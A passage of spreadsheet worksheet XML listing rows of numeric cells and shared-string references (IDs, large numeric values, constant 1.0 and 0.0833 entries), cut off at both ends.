        <v>901.0</v>
      </c>
      <c r="B33513" s="2">
        <v>2.2123456E7</v>
      </c>
      <c r="C33513" s="2" t="s">
        <v>32257</v>
      </c>
      <c r="D33513" s="2">
        <v>1.0</v>
      </c>
      <c r="E33513" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33513" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33514" ht="15.75" customHeight="1">
      <c r="A33514" s="1">
        <v>903.0</v>
      </c>
      <c r="B33514" s="2">
        <v>2.2124293E7</v>
      </c>
      <c r="C33514" s="2" t="s">
        <v>32258</v>
      </c>
      <c r="D33514" s="2">
        <v>1.0</v>
      </c>
      <c r="E33514" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33514" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33515" ht="15.75" customHeight="1">
      <c r="A33515" s="1">
        <v>907.0</v>
      </c>
      <c r="B33515" s="2">
        <v>2.2140752E7</v>
      </c>
      <c r="C33515" s="2" t="s">
        <v>32259</v>
      </c>
      <c r="D33515" s="2">
        <v>1.0</v>
      </c>
      <c r="E33515" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33515" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33516" ht="15.75" customHeight="1">
      <c r="A33516" s="1">
        <v>910.0</v>
      </c>
      <c r="B33516" s="2">
        <v>2.2177692E7</v>
      </c>
      <c r="C33516" s="2" t="s">
        <v>32260</v>
      </c>
      <c r="D33516" s="2">
        <v>1.0</v>
      </c>
      <c r="E33516" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33516" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33517" ht="15.75" customHeight="1">
      <c r="A33517" s="1">
        <v>951.0</v>
      </c>
      <c r="B33517" s="2">
        <v>2.2594075E7</v>
      </c>
      <c r="C33517" s="2" t="s">
        <v>32261</v>
      </c>
      <c r="D33517" s="2">
        <v>1.0</v>
      </c>
      <c r="E33517" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33517" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33518" ht="15.75" customHeight="1">
      <c r="A33518" s="1">
        <v>952.0</v>
      </c>
      <c r="B33518" s="2">
        <v>2.2594398E7</v>
      </c>
      <c r="C33518" s="2" t="s">
        <v>32262</v>
      </c>
      <c r="D33518" s="2">
        <v>1.0</v>
      </c>
      <c r="E33518" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33518" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33519" ht="15.75" customHeight="1">
      <c r="A33519" s="1">
        <v>953.0</v>
      </c>
      <c r="B33519" s="2">
        <v>2.2594398E7</v>
      </c>
      <c r="C33519" s="2" t="s">
        <v>32263</v>
      </c>
      <c r="D33519" s="2">
        <v>1.0</v>
      </c>
      <c r="E33519" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33519" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33520" ht="15.75" customHeight="1">
      <c r="A33520" s="1">
        <v>999.0</v>
      </c>
      <c r="B33520" s="2">
        <v>2.2931425E7</v>
      </c>
      <c r="C33520" s="2" t="s">
        <v>32264</v>
      </c>
      <c r="D33520" s="2">
        <v>1.0</v>
      </c>
      <c r="E33520" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33520" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33521" ht="15.75" customHeight="1">
      <c r="A33521" s="1">
        <v>1063.0</v>
      </c>
      <c r="B33521" s="2">
        <v>2.3513025E7</v>
      </c>
      <c r="C33521" s="2" t="s">
        <v>32265</v>
      </c>
      <c r="D33521" s="2">
        <v>1.0</v>
      </c>
      <c r="E33521" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33521" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33522" ht="15.75" customHeight="1">
      <c r="A33522" s="1">
        <v>1101.0</v>
      </c>
      <c r="B33522" s="2">
        <v>2.3971955E7</v>
      </c>
      <c r="C33522" s="2" t="s">
        <v>32266</v>
      </c>
      <c r="D33522" s="2">
        <v>1.0</v>
      </c>
      <c r="E33522" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33522" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33523" ht="15.75" customHeight="1">
      <c r="A33523" s="1">
        <v>1118.0</v>
      </c>
      <c r="B33523" s="2">
        <v>2.4091084E7</v>
      </c>
      <c r="C33523" s="2" t="s">
        <v>32267</v>
      </c>
      <c r="D33523" s="2">
        <v>1.0</v>
      </c>
      <c r="E33523" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33523" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33524" ht="15.75" customHeight="1">
      <c r="A33524" s="1">
        <v>1210.0</v>
      </c>
      <c r="B33524" s="2">
        <v>2.4840651E7</v>
      </c>
      <c r="C33524" s="2" t="s">
        <v>32268</v>
      </c>
      <c r="D33524" s="2">
        <v>1.0</v>
      </c>
      <c r="E33524" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33524" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33525" ht="15.75" customHeight="1">
      <c r="A33525" s="1">
        <v>1216.0</v>
      </c>
      <c r="B33525" s="2">
        <v>2.4878529E7</v>
      </c>
      <c r="C33525" s="2" t="s">
        <v>32269</v>
      </c>
      <c r="D33525" s="2">
        <v>1.0</v>
      </c>
      <c r="E33525" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33525" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33526" ht="15.75" customHeight="1">
      <c r="A33526" s="1">
        <v>1228.0</v>
      </c>
      <c r="B33526" s="2">
        <v>2.4966878E7</v>
      </c>
      <c r="C33526" s="2" t="s">
        <v>32270</v>
      </c>
      <c r="D33526" s="2">
        <v>1.0</v>
      </c>
      <c r="E33526" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33526" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33527" ht="15.75" customHeight="1">
      <c r="A33527" s="1">
        <v>1330.0</v>
      </c>
      <c r="B33527" s="2">
        <v>2.5831884E7</v>
      </c>
      <c r="C33527" s="2" t="s">
        <v>32271</v>
      </c>
      <c r="D33527" s="2">
        <v>1.0</v>
      </c>
      <c r="E33527" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33527" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33528" ht="15.75" customHeight="1">
      <c r="A33528" s="1">
        <v>1437.0</v>
      </c>
      <c r="B33528" s="2">
        <v>2.6687321E7</v>
      </c>
      <c r="C33528" s="2" t="s">
        <v>32272</v>
      </c>
      <c r="D33528" s="2">
        <v>1.0</v>
      </c>
      <c r="E33528" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33528" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33529" ht="15.75" customHeight="1">
      <c r="A33529" s="1">
        <v>1532.0</v>
      </c>
      <c r="B33529" s="2">
        <v>2.745701E7</v>
      </c>
      <c r="C33529" s="2" t="s">
        <v>32273</v>
      </c>
      <c r="D33529" s="2">
        <v>1.0</v>
      </c>
      <c r="E33529" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33529" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33530" ht="15.75" customHeight="1">
      <c r="A33530" s="1">
        <v>1572.0</v>
      </c>
      <c r="B33530" s="2">
        <v>2.7705939E7</v>
      </c>
      <c r="C33530" s="2" t="s">
        <v>32274</v>
      </c>
      <c r="D33530" s="2">
        <v>1.0</v>
      </c>
      <c r="E33530" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33530" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33531" ht="15.75" customHeight="1">
      <c r="A33531" s="1">
        <v>1577.0</v>
      </c>
      <c r="B33531" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C33531" s="2" t="s">
        <v>32275</v>
      </c>
      <c r="D33531" s="2">
        <v>1.0</v>
      </c>
      <c r="E33531" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33531" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33532" ht="15.75" customHeight="1">
      <c r="A33532" s="1">
        <v>1611.0</v>
      </c>
      <c r="B33532" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C33532" s="2" t="s">
        <v>32276</v>
      </c>
      <c r="D33532" s="2">
        <v>1.0</v>
      </c>
      <c r="E33532" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33532" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33533" ht="15.75" customHeight="1">
      <c r="A33533" s="1">
        <v>1638.0</v>
      </c>
      <c r="B33533" s="2">
        <v>2.8008199E7</v>
      </c>
      <c r="C33533" s="2" t="s">
        <v>32277</v>
      </c>
      <c r="D33533" s="2">
        <v>1.0</v>
      </c>
      <c r="E33533" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33533" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33534" ht="15.75" customHeight="1">
      <c r="A33534" s="1">
        <v>1677.0</v>
      </c>
      <c r="B33534" s="2">
        <v>2.8347301E7</v>
      </c>
      <c r="C33534" s="2" t="s">
        <v>32278</v>
      </c>
      <c r="D33534" s="2">
        <v>1.0</v>
      </c>
      <c r="E33534" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33534" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33535" ht="15.75" customHeight="1">
      <c r="A33535" s="1">
        <v>1772.0</v>
      </c>
      <c r="B33535" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C33535" s="2" t="s">
        <v>32279</v>
      </c>
      <c r="D33535" s="2">
        <v>1.0</v>
      </c>
      <c r="E33535" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33535" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33536" ht="15.75" customHeight="1">
      <c r="A33536" s="1">
        <v>1775.0</v>
      </c>
      <c r="B33536" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C33536" s="2" t="s">
        <v>32280</v>
      </c>
      <c r="D33536" s="2">
        <v>1.0</v>
      </c>
      <c r="E33536" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33536" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33537" ht="15.75" customHeight="1">
      <c r="A33537" s="1">
        <v>1781.0</v>
      </c>
      <c r="B33537" s="2">
        <v>2.9056408E7</v>
      </c>
      <c r="C33537" s="2" t="s">
        <v>32281</v>
      </c>
      <c r="D33537" s="2">
        <v>1.0</v>
      </c>
      <c r="E33537" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33537" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33538" ht="15.75" customHeight="1">
      <c r="A33538" s="1">
        <v>1795.0</v>
      </c>
      <c r="B33538" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C33538" s="2" t="s">
        <v>32282</v>
      </c>
      <c r="D33538" s="2">
        <v>1.0</v>
      </c>
      <c r="E33538" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33538" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33539" ht="15.75" customHeight="1">
      <c r="A33539" s="1">
        <v>1816.0</v>
      </c>
      <c r="B33539" s="2">
        <v>2.9229537E7</v>
      </c>
      <c r="C33539" s="2" t="s">
        <v>32283</v>
      </c>
      <c r="D33539" s="2">
        <v>1.0</v>
      </c>
      <c r="E33539" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33539" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33540" ht="15.75" customHeight="1">
      <c r="A33540" s="1">
        <v>1928.0</v>
      </c>
      <c r="B33540" s="2">
        <v>3.0134515E7</v>
      </c>
      <c r="C33540" s="2" t="s">
        <v>32284</v>
      </c>
      <c r="D33540" s="2">
        <v>1.0</v>
      </c>
      <c r="E33540" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33540" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33541" ht="15.75" customHeight="1">
      <c r="A33541" s="1">
        <v>1938.0</v>
      </c>
      <c r="B33541" s="2">
        <v>3.0199667E7</v>
      </c>
      <c r="C33541" s="2" t="s">
        <v>32285</v>
      </c>
      <c r="D33541" s="2">
        <v>1.0</v>
      </c>
      <c r="E33541" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33541" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33542" ht="15.75" customHeight="1">
      <c r="A33542" s="1">
        <v>2021.0</v>
      </c>
      <c r="B33542" s="2">
        <v>3.0768775E7</v>
      </c>
      <c r="C33542" s="2" t="s">
        <v>32286</v>
      </c>
      <c r="D33542" s="2">
        <v>1.0</v>
      </c>
      <c r="E33542" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33542" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33543" ht="15.75" customHeight="1">
      <c r="A33543" s="1">
        <v>2030.0</v>
      </c>
      <c r="B33543" s="2">
        <v>3.0811202E7</v>
      </c>
      <c r="C33543" s="2" t="s">
        <v>32287</v>
      </c>
      <c r="D33543" s="2">
        <v>1.0</v>
      </c>
      <c r="E33543" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33543" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33544" ht="15.75" customHeight="1">
      <c r="A33544" s="1">
        <v>2054.0</v>
      </c>
      <c r="B33544" s="2">
        <v>3.0973253E7</v>
      </c>
      <c r="C33544" s="2" t="s">
        <v>32288</v>
      </c>
      <c r="D33544" s="2">
        <v>1.0</v>
      </c>
      <c r="E33544" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33544" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33545" ht="15.75" customHeight="1">
      <c r="A33545" s="1">
        <v>2083.0</v>
      </c>
      <c r="B33545" s="2">
        <v>3.1169802E7</v>
      </c>
      <c r="C33545" s="2" t="s">
        <v>32289</v>
      </c>
      <c r="D33545" s="2">
        <v>1.0</v>
      </c>
      <c r="E33545" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33545" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33546" ht="15.75" customHeight="1">
      <c r="A33546" s="1">
        <v>2086.0</v>
      </c>
      <c r="B33546" s="2">
        <v>3.1196136E7</v>
      </c>
      <c r="C33546" s="2" t="s">
        <v>32290</v>
      </c>
      <c r="D33546" s="2">
        <v>1.0</v>
      </c>
      <c r="E33546" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33546" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33547" ht="15.75" customHeight="1">
      <c r="A33547" s="1">
        <v>2087.0</v>
      </c>
      <c r="B33547" s="2">
        <v>3.1196136E7</v>
      </c>
      <c r="C33547" s="2" t="s">
        <v>32290</v>
      </c>
      <c r="D33547" s="2">
        <v>1.0</v>
      </c>
      <c r="E33547" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33547" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33548" ht="15.75" customHeight="1">
      <c r="A33548" s="1">
        <v>2098.0</v>
      </c>
      <c r="B33548" s="2">
        <v>3.130418E7</v>
      </c>
      <c r="C33548" s="2" t="s">
        <v>32291</v>
      </c>
      <c r="D33548" s="2">
        <v>1.0</v>
      </c>
      <c r="E33548" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33548" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33549" ht="15.75" customHeight="1">
      <c r="A33549" s="1">
        <v>2108.0</v>
      </c>
      <c r="B33549" s="2">
        <v>3.1342053E7</v>
      </c>
      <c r="C33549" s="2" t="s">
        <v>32292</v>
      </c>
      <c r="D33549" s="2">
        <v>1.0</v>
      </c>
      <c r="E33549" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33549" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33550" ht="15.75" customHeight="1">
      <c r="A33550" s="1">
        <v>2174.0</v>
      </c>
      <c r="B33550" s="2">
        <v>3.1768621E7</v>
      </c>
      <c r="C33550" s="2" t="s">
        <v>32293</v>
      </c>
      <c r="D33550" s="2">
        <v>1.0</v>
      </c>
      <c r="E33550" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33550" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33551" ht="15.75" customHeight="1">
      <c r="A33551" s="1">
        <v>2175.0</v>
      </c>
      <c r="B33551" s="2">
        <v>3.1786122E7</v>
      </c>
      <c r="C33551" s="2" t="s">
        <v>32294</v>
      </c>
      <c r="D33551" s="2">
        <v>1.0</v>
      </c>
      <c r="E33551" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33551" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33552" ht="15.75" customHeight="1">
      <c r="A33552" s="1">
        <v>2185.0</v>
      </c>
      <c r="B33552" s="2">
        <v>3.1881651E7</v>
      </c>
      <c r="C33552" s="2" t="s">
        <v>32295</v>
      </c>
      <c r="D33552" s="2">
        <v>1.0</v>
      </c>
      <c r="E33552" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33552" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33553" ht="15.75" customHeight="1">
      <c r="A33553" s="1">
        <v>2227.0</v>
      </c>
      <c r="B33553" s="2">
        <v>3.2233596E7</v>
      </c>
      <c r="C33553" s="2" t="s">
        <v>32296</v>
      </c>
      <c r="D33553" s="2">
        <v>1.0</v>
      </c>
      <c r="E33553" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33553" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33554" ht="15.75" customHeight="1">
      <c r="A33554" s="1">
        <v>2228.0</v>
      </c>
      <c r="B33554" s="2">
        <v>3.2236946E7</v>
      </c>
      <c r="C33554" s="2" t="s">
        <v>32297</v>
      </c>
      <c r="D33554" s="2">
        <v>1.0</v>
      </c>
      <c r="E33554" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33554" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33555" ht="15.75" customHeight="1">
      <c r="A33555" s="1">
        <v>2238.0</v>
      </c>
      <c r="B33555" s="2">
        <v>3.23E7</v>
      </c>
      <c r="C33555" s="2" t="s">
        <v>32298</v>
      </c>
      <c r="D33555" s="2">
        <v>1.0</v>
      </c>
      <c r="E33555" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33555" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33556" ht="15.75" customHeight="1">
      <c r="A33556" s="1">
        <v>2270.0</v>
      </c>
      <c r="B33556" s="2">
        <v>3.251117E7</v>
      </c>
      <c r="C33556" s="2" t="s">
        <v>32299</v>
      </c>
      <c r="D33556" s="2">
        <v>1.0</v>
      </c>
      <c r="E33556" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33556" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33557" ht="15.75" customHeight="1">
      <c r="A33557" s="1">
        <v>2280.0</v>
      </c>
      <c r="B33557" s="2">
        <v>3.2541759E7</v>
      </c>
      <c r="C33557" s="2" t="s">
        <v>32300</v>
      </c>
      <c r="D33557" s="2">
        <v>1.0</v>
      </c>
      <c r="E33557" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33557" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33558" ht="15.75" customHeight="1">
      <c r="A33558" s="1">
        <v>2290.0</v>
      </c>
      <c r="B33558" s="2">
        <v>3.2602113E7</v>
      </c>
      <c r="C33558" s="2" t="s">
        <v>32301</v>
      </c>
      <c r="D33558" s="2">
        <v>1.0</v>
      </c>
      <c r="E33558" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33558" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33559" ht="15.75" customHeight="1">
      <c r="A33559" s="1">
        <v>2307.0</v>
      </c>
      <c r="B33559" s="2">
        <v>3.2773342E7</v>
      </c>
      <c r="C33559" s="2" t="s">
        <v>32302</v>
      </c>
      <c r="D33559" s="2">
        <v>1.0</v>
      </c>
      <c r="E33559" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33559" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33560" ht="15.75" customHeight="1">
      <c r="A33560" s="1">
        <v>2330.0</v>
      </c>
      <c r="B33560" s="2">
        <v>3.2936022E7</v>
      </c>
      <c r="C33560" s="2" t="s">
        <v>32303</v>
      </c>
      <c r="D33560" s="2">
        <v>1.0</v>
      </c>
      <c r="E33560" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33560" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33561" ht="15.75" customHeight="1">
      <c r="A33561" s="1">
        <v>2388.0</v>
      </c>
      <c r="B33561" s="2">
        <v>3.3343273E7</v>
      </c>
      <c r="C33561" s="2" t="s">
        <v>32304</v>
      </c>
      <c r="D33561" s="2">
        <v>1.0</v>
      </c>
      <c r="E33561" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33561" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33562" ht="15.75" customHeight="1">
      <c r="A33562" s="1">
        <v>2444.0</v>
      </c>
      <c r="B33562" s="2">
        <v>3.3705038E7</v>
      </c>
      <c r="C33562" s="2" t="s">
        <v>32305</v>
      </c>
      <c r="D33562" s="2">
        <v>1.0</v>
      </c>
      <c r="E33562" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33562" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33563" ht="15.75" customHeight="1">
      <c r="A33563" s="1">
        <v>2462.0</v>
      </c>
      <c r="B33563" s="2">
        <v>3.3753985E7</v>
      </c>
      <c r="C33563" s="2" t="s">
        <v>32306</v>
      </c>
      <c r="D33563" s="2">
        <v>1.0</v>
      </c>
      <c r="E33563" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33563" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33564" ht="15.75" customHeight="1">
      <c r="A33564" s="1">
        <v>2481.0</v>
      </c>
      <c r="B33564" s="2">
        <v>3.3855556E7</v>
      </c>
      <c r="C33564" s="2" t="s">
        <v>32307</v>
      </c>
      <c r="D33564" s="2">
        <v>1.0</v>
      </c>
      <c r="E33564" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33564" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33565" ht="15.75" customHeight="1">
      <c r="A33565" s="1">
        <v>2519.0</v>
      </c>
      <c r="B33565" s="2">
        <v>3.4011647E7</v>
      </c>
      <c r="C33565" s="2" t="s">
        <v>32308</v>
      </c>
      <c r="D33565" s="2">
        <v>1.0</v>
      </c>
      <c r="E33565" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33565" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33566" ht="15.75" customHeight="1">
      <c r="A33566" s="1">
        <v>2530.0</v>
      </c>
      <c r="B33566" s="2">
        <v>3.4092613E7</v>
      </c>
      <c r="C33566" s="2" t="s">
        <v>32309</v>
      </c>
      <c r="D33566" s="2">
        <v>1.0</v>
      </c>
      <c r="E33566" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33566" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33567" ht="15.75" customHeight="1">
      <c r="A33567" s="1">
        <v>2570.0</v>
      </c>
      <c r="B33567" s="2">
        <v>3.4243734E7</v>
      </c>
      <c r="C33567" s="2" t="s">
        <v>32310</v>
      </c>
      <c r="D33567" s="2">
        <v>1.0</v>
      </c>
      <c r="E33567" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33567" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33568" ht="15.75" customHeight="1">
      <c r="A33568" s="1">
        <v>2596.0</v>
      </c>
      <c r="B33568" s="2">
        <v>3.4367412E7</v>
      </c>
      <c r="C33568" s="2" t="s">
        <v>32311</v>
      </c>
      <c r="D33568" s="2">
        <v>1.0</v>
      </c>
      <c r="E33568" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33568" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33569" ht="15.75" customHeight="1">
      <c r="A33569" s="1">
        <v>2607.0</v>
      </c>
      <c r="B33569" s="2">
        <v>3.4409792E7</v>
      </c>
      <c r="C33569" s="2" t="s">
        <v>32312</v>
      </c>
      <c r="D33569" s="2">
        <v>1.0</v>
      </c>
      <c r="E33569" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33569" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33570" ht="15.75" customHeight="1">
      <c r="A33570" s="1">
        <v>2621.0</v>
      </c>
      <c r="B33570" s="2">
        <v>3.4487265E7</v>
      </c>
      <c r="C33570" s="2" t="s">
        <v>32313</v>
      </c>
      <c r="D33570" s="2">
        <v>1.0</v>
      </c>
      <c r="E33570" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33570" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33571" ht="15.75" customHeight="1">
      <c r="A33571" s="1">
        <v>2653.0</v>
      </c>
      <c r="B33571" s="2">
        <v>3.4686218E7</v>
      </c>
      <c r="C33571" s="2" t="s">
        <v>32314</v>
      </c>
      <c r="D33571" s="2">
        <v>1.0</v>
      </c>
      <c r="E33571" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33571" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33572" ht="15.75" customHeight="1">
      <c r="A33572" s="1">
        <v>2665.0</v>
      </c>
      <c r="B33572" s="2">
        <v>3.4717117E7</v>
      </c>
      <c r="C33572" s="2" t="s">
        <v>32315</v>
      </c>
      <c r="D33572" s="2">
        <v>1.0</v>
      </c>
      <c r="E33572" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33572" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33573" ht="15.75" customHeight="1">
      <c r="A33573" s="1">
        <v>2683.0</v>
      </c>
      <c r="B33573" s="2">
        <v>3.4810211E7</v>
      </c>
      <c r="C33573" s="2" t="s">
        <v>32316</v>
      </c>
      <c r="D33573" s="2">
        <v>1.0</v>
      </c>
      <c r="E33573" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33573" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33574" ht="15.75" customHeight="1">
      <c r="A33574" s="1">
        <v>2686.0</v>
      </c>
      <c r="B33574" s="2">
        <v>3.4811654E7</v>
      </c>
      <c r="C33574" s="2" t="s">
        <v>32317</v>
      </c>
      <c r="D33574" s="2">
        <v>1.0</v>
      </c>
      <c r="E33574" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33574" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33575" ht="15.75" customHeight="1">
      <c r="A33575" s="1">
        <v>2815.0</v>
      </c>
      <c r="B33575" s="2">
        <v>3.5374162E7</v>
      </c>
      <c r="C33575" s="2" t="s">
        <v>32318</v>
      </c>
      <c r="D33575" s="2">
        <v>1.0</v>
      </c>
      <c r="E33575" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33575" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33576" ht="15.75" customHeight="1">
      <c r="A33576" s="1">
        <v>2829.0</v>
      </c>
      <c r="B33576" s="2">
        <v>3.5399115E7</v>
      </c>
      <c r="C33576" s="2" t="s">
        <v>32319</v>
      </c>
      <c r="D33576" s="2">
        <v>1.0</v>
      </c>
      <c r="E33576" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33576" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33577" ht="15.75" customHeight="1">
      <c r="A33577" s="1">
        <v>2838.0</v>
      </c>
      <c r="B33577" s="2">
        <v>3.5439264E7</v>
      </c>
      <c r="C33577" s="2" t="s">
        <v>32320</v>
      </c>
      <c r="D33577" s="2">
        <v>1.0</v>
      </c>
      <c r="E33577" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33577" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33578" ht="15.75" customHeight="1">
      <c r="A33578" s="1">
        <v>2859.0</v>
      </c>
      <c r="B33578" s="2">
        <v>3.55361E7</v>
      </c>
      <c r="C33578" s="2" t="s">
        <v>32321</v>
      </c>
      <c r="D33578" s="2">
        <v>1.0</v>
      </c>
      <c r="E33578" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33578" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33579" ht="15.75" customHeight="1">
      <c r="A33579" s="1">
        <v>2901.0</v>
      </c>
      <c r="B33579" s="2">
        <v>3.5752088E7</v>
      </c>
      <c r="C33579" s="2" t="s">
        <v>32322</v>
      </c>
      <c r="D33579" s="2">
        <v>1.0</v>
      </c>
      <c r="E33579" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33579" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33580" ht="15.75" customHeight="1">
      <c r="A33580" s="1">
